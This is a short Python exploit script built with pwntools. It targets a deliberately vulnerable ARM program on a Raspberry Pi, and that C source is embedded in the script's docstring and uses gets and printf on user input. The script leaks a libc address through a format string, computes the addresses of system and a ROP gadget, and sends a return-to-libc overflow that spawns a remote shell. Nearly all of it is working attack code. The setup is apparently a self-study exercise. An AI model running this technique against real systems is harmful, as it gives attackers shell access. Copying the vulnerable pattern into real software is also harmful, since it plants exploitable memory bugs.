Ret2libc on raspberry pi exploit

exploit-pi.py

from pwn import *

'''
// Raspberry pi:
// File: leak.c
// gcc leak.c -o leak
// socat -v tcp-listen:4444,reuseaddr,fork exec:"./leak"

#include <stdio.h>

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    char buff[64];
    char t[10];
    printf("Welcome\n");
    gets(t);
    printf(t);
    printf("\n");
    gets(buff);
    return 0;
}


'''

context(arch = 'arm', os = 'linux')

p = remote('192.168.2.230',4444)

p.recvline()
p.sendline("%27$p")                                                     # leak __libc_start_main + 276
libc = p.recvline()
__libc_start_main = p32(int(libc, 16)) # -276
libc_addr = int(libc, 16)-276 - 0x16564                                 # 2109: 00016564   608 FUNC    GLOBAL DEFAULT   12 __libc_start_main@@GLIBC_2.4 
system_addr = libc_addr + 0x37154                                       # 1343: 00037154    44 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.4
pop_r0_r4_pc = libc_addr + 0x7753c                                      # 0x0007753c: pop {r0, r4, pc}; 
bin_sh = libc_addr + 0x11d588                                           
log.success("libc addr: " + hex(libc_addr))
log.success("system addr: " + hex(system_addr))
log.success("gadget \"pop {r0, r4, pc}\": " + hex(pop_r0_r4_pc))
log.success("/bin/sh addr: " + hex(bin_sh))
p.sendline("A"*68+p32(pop_r0_r4_pc)+p32(bin_sh)+"AAAA"+p32(system_addr))
p.interactive()